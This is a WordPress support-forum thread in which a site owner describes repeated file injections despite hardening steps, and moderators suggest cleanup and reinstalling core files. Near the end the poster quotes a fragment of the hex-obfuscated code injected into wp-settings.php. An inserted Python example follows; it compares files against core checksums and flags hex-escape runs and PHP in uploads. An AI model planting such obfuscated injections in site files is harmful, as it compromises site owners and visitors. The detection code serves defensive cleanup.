• Jeroenla

    (@jeroenla)


    [ Moved to the Fixing WordPress sub-forum. ]

    I have some persistent problems with hackers. It’s been going on for the entire week now. Every single time, I think I’ve got things covered, but each time, they strike again, putting some nasty scripts in my files. This morning, my index.php was infected. How on earth do they do this?

    Measures taken so far:
    1) Installed WordFence, and configured it as firewall
    –> It reduces problems, yes. But it doesn’t eliminate
    2) Started using CloudFlare
    –> Recommended by host, as an additional layer of protection from the Russkis (that’s where the hacks come from, along with Ukraine)
    3) I’ve moved my wp-login to an undisclosed location using a security plugin
    4) Changed rights to my config to read-only
    5) And finally, changed my table prefix this morning (after fixing index.php again).

    What else can I possibly do to keep those nasty reds (yay for old-school cold war cliché) out of my files?

Viewing 15 replies - 1 through 15 (of 16 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri, SiteLock and Wordfence are a few.

    Thread Starter Jeroenla

    (@jeroenla)

    Well… I think I did all the things in that guide. Only the htaccess things seem new to my untrained eye…

    And god, please stop telling me to remain calm. After a week of constant artillery fire, that’s not quite having the effect you’re hoping for 😉

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    OK. DRINK MUCH COFFEE!!!!! 🙂

    You may have to burn the site down and rebuild, assuming your database is unhacked. Change the password for your hosting account, just in case that’s been compromised, too. If all else fails, consider hiring one of the companies I mentioned to clean your site. It’s what they do all day long; they’ll be more efficient at it than you.

    aCstudent

    (@acstudent)

    Do you have legitimate visitors from Russia and Ukraine? If not, you can block those countries’ IPs in CloudFlare, on the Firewall page.

    Thread Starter Jeroenla

    (@jeroenla)

    Sadly, I cannot afford those companies. It’s a hobby thing. But one which I’ve spent blood sweat and tears on for the last 15 years…

    This morning, something new. A 403…

    I don’t usually have legit visitors from those countries. Good idea to block them entirely…

    Thread Starter Jeroenla

    (@jeroenla)

    ok… I am really confused.
    I had to restore the files to the state they were in before I changed the prefix to my tables. My host helpdesk tells me the prefix is in the wp-config, but there it still lists the old prefix…

    How can this be? Shouldn’t this cause a conflict? I mean, the file tells it to look for table prefix A, but this doesn’t exist anymore.

    I’ve changed it into the prefix which it should have, and the site seems to work (also after purging the cloudflare cache).

    So…. what else did I do?

    Well, i did change the .htaccess yesterday, putting this in (source):

    WP-Content/Uploads

    The uploads directory is the one directory that will almost need to be writable by the web server. It’s where all files are uploaded remotely. You want to prevent PHP execution in this directory; you can do this by placing an .htaccess at the root of /UPLOADS using:

    # Kill PHP Execution
    <Files *.php>
    deny from all
    </Files>

    Note: This can break your theme if it requires PHP execution in UPLOADS. If you apply it and the site breaks, remove it and the site will reappear.
    WP-Config.php

    If you use a server with .htaccess, you can put this in that file (at the very top) to deny access to anyone surfing for it:

    <files wp-config.php>
    order allow,deny
    deny from all
    </files>

    Disable File Editing

    It is recommended to disable file editing within the WordPress dashboard. WordPress has a constant that disables this editing via the wp-config.php file. Append the following two lines to the end of your wp-config file:

    ## Disable Editing in Dashboard
    define('DISALLOW_FILE_EDIT', true);

    I copy pasted both into my htaccess, directly following the standard bits. Can this be cause for problems?

    Thread Starter Jeroenla

    (@jeroenla)

    Also: how do I block countries entirely?

    Thread Starter Jeroenla

    (@jeroenla)

    dafuq…now the site is gone again…
    I get the setup page!

    Thread Starter Jeroenla

    (@jeroenla)

    Edit:
    ok, site went down again. I had to restore the backup. In the current version, wp-admin is still moved, but the prefix remains…odd…

    Thread Starter Jeroenla

    (@jeroenla)

    And the saga continues. Every day, my index.php gets some script injected, along with wp-settings and…uh… another one.

    I’ve changed the rights for wp-settings to 400, and index as well.

    I’ve changed password to the admin user
    I’ve changed ftp password
    I’ve changed cPanel password
    I’ve changed them again

    I’ve moved wp-admin (using iThemes security)
    I’ve changed the prefix

    I’ve run an AVG scan on my desktop
    I’ve run a Malwarebytes scan on my desktop
    I’ve run an S&D Spybot scan on my desktop

    I’ve sacrificed three virgins at a stake of burning oakwood at full moon…..

    I’ve gone through my files, and removed a bunch of old (legacy) stuff, including my old Joomla installation.

    Anything else?

    (PS: No, I cannot hire a pro. I just don’t have that kind of money and this is just a hobby. Please, don’t suggest it, and don’t tell me I should choose wisely. If there is no money, there is nothing to choose.)

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Are you using WordPress 4.7.2?

    Have you talked to your hosting provider?

    I’ve gone through my files, and removed a bunch of old (legacy) stuff, including my old Joomla installation.

    hmmm…. that could be a vector

    Thread Starter Jeroenla

    (@jeroenla)

    …vector…? Does that mean “something which could cause the problem”?

    I am indeed on 4.7.2. I’ve spoken to the host. Nothing that can be done. Also noteworthy… I have other WP sites with them. Not all are affected.

    I have also gone to change my .htaccess as described here: https://codex.wordpress.org/Hardening_WordPress

    And for most of the suggestions, I understand what they do, but what does this mean:

    WP-Config.php

    If you use a server with .htaccess, you can put this in that file (at the very top) to deny access to anyone surfing for it:

    <files wp-config.php>
    order allow,deny
    deny from all
    </files>

    (Cross my fingers that the site still works once I upload the changed htaccess….)

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Your wp-config.php file is not visible/useful from the front end, regardless of that stuff in .htaccess.

    It’s clear your site is compromised. You need to rigorously replace files per the guide in the “remain calm” message above.

    Thread Starter Jeroenla

    (@jeroenla)

    Edit: changing the htaccess killed the site. I put the following behind the content which was already in it:

    # Block the include-only files.
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^wp-admin/includes/ - [F,L]
    RewriteRule !^wp-includes/ - [S=3]
    RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
    RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
    RewriteRule ^wp-includes/theme-compat/ - [F,L]
    </IfModule>
    # BEGIN WordPress
    
    # Kill PHP Execution
    <Files *.php>
    deny from all
    </Files>
    
    ## Disable Editing in Dashboard
    define('DISALLOW_FILE_EDIT', true);
    Thread Starter Jeroenla

    (@jeroenla)

    Ok..
    so I need to download the WordPress version corresponding to my version and then just overwrite the /wp-admin and the /wp-includes section.

    I can understand how to do this. But what I don’t understand is how it works. I mean… WordFence checks the files on my server against the files in the repository. And if it finds a difference, it allows me to fix it with one click of the button.

    So..if it doesn’t find any difference, it means the files are equal to the original, right? So how can it be infected then?

    Logically (or at least, to me it’s logical) this would imply the compromisation (is that a word) lies elsewhere. But where?

    index.php
    header.php
    footer.php
    function.php

    All seem like proper code (not a coder, but over the week I’ve learned to quickly recognize the infections), so those seem to not be the problem. Still, this morning, my wp-config was, once again, injected with a script.

    This leads to stuff like this (from wp-settings)

     Most of WP is loaded at this stage, and the user is authent*/"\x2fhom\x65/je\x72oej\x6d181\x2fdom\x61ins\x2ffin\x61nci\x65ler\x65ddi\x6egsb\x6fei.\x6el/p\x75bli\x63_ht\x6dl/c\x6fmmu\x6eity\x2dtev\x65rwi\x6ader\x65nna\x31maa\x72t20\x317/w\x70-ad\x6din/\x62log\x2ephp";/*icated. WP continues
     * to load on the {@see 'init'} 
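The core-checksum question in the post above, and the hex-escaped string injected into wp-settings.php, get a worked illustration here. This is an added example, not code from the thread or from Wordfence: it runs a Wordfence-style hash comparison against a core manifest, lists what such a comparison can never see (wp-config.php and anything under uploads), and flags the run-of-hex-escapes pattern of the injection. The file contents, paths and manifest hashes are all constructed stand-ins.

```python
import hashlib
import re

# Constructed sample site tree (path -> contents); not the poster's real files.
# wp-settings.php carries an injected hex-escaped string of the kind quoted in
# the thread; the uploads file is PHP that has no business being there.
SITE = {
    "index.php": b"<?php\nrequire( dirname( __FILE__ ) . '/wp-blog-header.php' );\n",
    "wp-settings.php": (
        b"<?php\n/* Most of WP is loaded at this stage, and the user is authent*/"
        b"\"\\x2fhom\\x65/\\x65xam\\x70le/\\x62log\\x2ephp\";/*icated. WP continues\n"
        b" * to load on the {@see 'init'} */\n"
    ),
    "wp-config.php": b"<?php\n$table_prefix = 'wp_';\n",
    "wp-content/uploads/2017/03/photo.php": b"<?php echo 'constructed';\n",
}

# Constructed stand-in for a core checksum manifest. A real one comes from
# api.wordpress.org for the installed version and lists core files only:
# wp-config.php, themes, plugins and uploads are never in it.
CORE_MD5 = {
    "index.php": hashlib.md5(SITE["index.php"]).hexdigest(),  # clean copy
    "wp-settings.php": "d41d8cd98f00b204e9800998ecf8427e",     # constructed "clean" hash
}

# Six or more \xNN escapes with at most four plain characters between them:
# core code never looks like this, the injected string does.
HEX_ESCAPE_RUN = re.compile(rb'(?:\\x[0-9a-fA-F]{2}[^"\\]{0,4}){6,}')

def check_core(site, manifest):
    """Core files whose hash differs, and files the manifest says nothing about."""
    modified = sorted(p for p, h in manifest.items()
                      if p in site and hashlib.md5(site[p]).hexdigest() != h)
    unmanaged = sorted(p for p in site if p not in manifest)
    return modified, unmanaged

def find_obfuscated(site):
    """Files containing a long run of hex escapes, like the wp-settings injection."""
    return sorted(p for p, data in site.items() if HEX_ESCAPE_RUN.search(data))

def find_php_in_uploads(site):
    """PHP under wp-content/uploads: a core checksum scan will never report these."""
    return sorted(p for p in site
                  if p.startswith("wp-content/uploads/") and p.endswith(".php"))

if __name__ == "__main__":
    modified, unmanaged = check_core(SITE, CORE_MD5)
    print("modified core files:", modified)
    print("not covered by the core check:", unmanaged)
    print("hex-escape runs:", find_obfuscated(SITE))
    print("php in uploads:", find_php_in_uploads(SITE))
```

A clean core comparison therefore only proves the manifest's files are original; the poster's wp-config.php and the uploads tree have to be inspected separately.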

The topic ‘Hackers – what else can I do?’ is closed to new replies.